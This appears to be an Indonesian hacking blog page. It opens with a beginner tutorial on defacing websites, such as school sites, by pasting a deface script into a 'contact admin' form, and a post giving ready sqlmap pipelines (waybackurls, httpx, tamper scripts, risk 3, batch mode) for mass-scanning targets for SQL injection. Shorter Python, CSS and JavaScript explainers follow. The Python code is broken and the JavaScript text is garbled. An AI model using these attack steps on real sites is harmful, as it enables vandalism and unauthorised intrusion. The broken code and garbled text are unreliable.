Wednesday, 4 December 2024

Cara Deface Website - Belajar Hacking Untuk Pemula

      1 comment   
Halo semuanya, pada postingan kali ini saya ingin membagikan tutorial cara belajar hacking untuk pemula.



Tutorial yang akan saya bagikan atau share kali ini adalah cara deface sebuah website, mungkin tidak asing bagi kalian untuk yang masih awam ataupun yang sudah berkecimpung dalam dunia hacking.
ya.. deface adalah teknik atau cara untuk merubah tampilan halaman website dengan berbagai gambar, karakter, tulisan bahkan animasi yang di pasang pada halaman website bahkan halaman utama website.

Cara ini dilarang karna sifatnya yang merusak, tapi bagi sebagian orang, ini adalah jurus supaya anda di bilang heker, wkwkwk....

CATATAN : saya membagikan tutotial ini semata - mata hanya untuk pembelajaran saja dan jika ada sesuatu hal yang jika dibuat untuk merusak website orang lain, saya tidak bertanggung jawab atas itu.

Baik langsung dan singkat saja,
Deface adalah cara kita menyisipkan script html kedalam website target dengan cara-cara tertentu. cara yang akan saya bagikan adalah metode deface melalui celah halaman admin. pertama siapkan dulu script deface kalian, jika belum punya usaha dulu bagaimana cara membuat file deface dengan format html tersebut.

Nah langsung aja cari web targer kalian, lalu cari menu halaman "hubungi admin" hampir semua website memiliki fitur tersebut, apalagi website sekolah yang biasa menjadi bahan pembelajaran anak-anak deface yang baru belajar. nah jika sudah ketemu halaman atau menu "hubungi admin" langsung aja tuh kalian klik dan kalian isi data diri anda asal aja, lalu pada kolom pesan atau pada bagian penulisan apa yang ingin di sampaikan, kalian isi dengan script deface kalian. jika sudah kalian enter untuk memngirim. cukup mudah bukan ? ya itu sangat mudah jika anda mengetahui caranya.

Lalu bagaimana cara membuka file deface kalian agar tampil ? caranya anda masukan url target kalian,di sambung dengan ini.. contoh : https://webtarget.com/hubungiadmin/namafiledeface.html lalu klik enter, jika deface kalian terbuka artinya web tersebut vuln/memiliki kerentanan, jika tidak terbuka, maka web tersebut aman/tidak vuln. dan langkah selanjutnya adalah cari target baru.

Nah segitu dulu tutorial yang bisa saya share hari ini, selamat belajar.

Wednesday, 13 November 2024

Cara mudah mencari kerentanan sql injection

      Comment   
Berikut adalah cara paling mudah untuk mencari kerentanan sql injection pada sebuah website hanya dengan 1 perintah.



1 Baris perintah untuk mencari kerentanan SQLI :


waybackurls target.com | grep '=' | httpx --silent --status-code | awk '{print $1}' | xargs -I{} sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'


atau


waybackurls target.com | grep '=' | httpx --silent --status-code | awk '{print $1}' | xargs -I{} sqlmap -u {} --random-agent --tamper=space2comment --level 5 --risk 3 --batch --threads 5



1. waybackurls target.com


Deskripsi: Alat waybackurls digunakan untuk mengambil arsip URL dari Wayback Machine atau penyimpanan arsip lainnya untuk domain target.com.

    

Fungsi: Ini memberikan daftar URL yang sebelumnya diketahui untuk domain tersebut, yang bisa mencakup titik masuk potensial bagi serangan.


2. grep '='


Deskripsi: grep '=' digunakan untuk memfilter URL yang mengandung tanda =.

   

Fungsi: URL yang mengandung = biasanya menunjukkan adanya parameter dalam URL, yang mungkin rentan terhadap serangan SQL Injection atau eksploitasi parameter lainnya.


3. httpx --silent --status-code


Deskripsi: httpx adalah alat yang mengirimkan permintaan HTTP ke URL yang difilter dari output waybackurls dan menambahkan status code HTTP pada setiap baris URL hasilnya.

    

Fungsi: Ini memeriksa apakah URL masih aktif (contohnya, hanya mengambil URL yang memiliki kode status valid seperti 200).


4. awk '{print $1}'


Deskripsi: awk digunakan untuk menampilkan hanya URL, tanpa status code.

    

Fungsi: Karena httpx menambahkan status code pada output, awk '{print $1}' memisahkan URL tersebut agar mudah digunakan dalam tahap selanjutnya.


5. xargs -I{} sqlmap -u {} ...


Deskripsi: xargs menjalankan perintah sqlmap untuk setiap URL yang difilter, menggantikan {} dengan URL dari hasil awk.

    

Fungsi: xargs memungkinkan penggunaan dinamis dari URL sebagai input untuk sqlmap.


6. sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'

Tuesday, 27 August 2024

Script Python sederhana untuk menyimpan nilai ke dalam file

      Comment   
Python, sebuah bahasa pemrograman yang populer dan fleksibel, telah mengubah dunia teknologi dengan cara yang luar biasa. Dengan sintaksis yang mudah dibaca dan berbagai perpustakaan standar, Python menjadi pilihan utama bagi programmer untuk mengembangkan aplikasi web, data science, AI, dan lain-lain.



Berikut ini adalah contoh script Python sederhana untuk menyimpan nilai ke dalam file:


python

Contoh script :

# Buat file baru jika tidak ada
if not os.path.exists('data.txt'):  # Check if file exists 
    with open('data.txt', 'w') as f:  # Create new file if not exist 
        pass   # Do nothing here    
# Tentukan nilai untuk ditulis ke dalam file  
value = input("Enter a value to be saved: ")   # Get user input   
# Simpan nilai ke dalam file    
with open('data.txt', 'a') as f:   # Open the existing or new file for writing    f.write(f"{value}\n") # Write the value to the end of the text in a new line      f.close()   # Close the opened files     print("Value saved successfully!")       ```

Apa itu CSS ?

      Comment   
CSS (Cascading Style Sheets) adalah bahasa yang digunakan untuk mendeskripsikan penampilan dokumen yang ditulis dengan HTML. Ini memungkinkan Anda untuk menentukan cara penggunaan elemen di halaman web, seperti teks, gambar dan tabel, harus terlihat. Dengan CSS, Anda dapat mengubah warna, ukuran huruf dan gaya font, jarak antara elemen dan lainnya lagi.



Contoh:

css

/* Set all paragraphs to have an orange background */
p { 
  background-color: orange; 
}  

Apa itu Java Script ?

      Comment   
JavaScript adalah bahasa pemrograman skrip yang populer dan dinamis. Dibuat oleh Brendan Eich, JavaScript pertama kali dirilis pada tahun 1995 sebagai bagian integral dariperambilan World Wide Web (WW).



JavaScript digunakan untukmembuat web page interaktif, menyakaniinya untukmenyapembuatan event handling dan memngganti data transfer antarasional data antarasional data.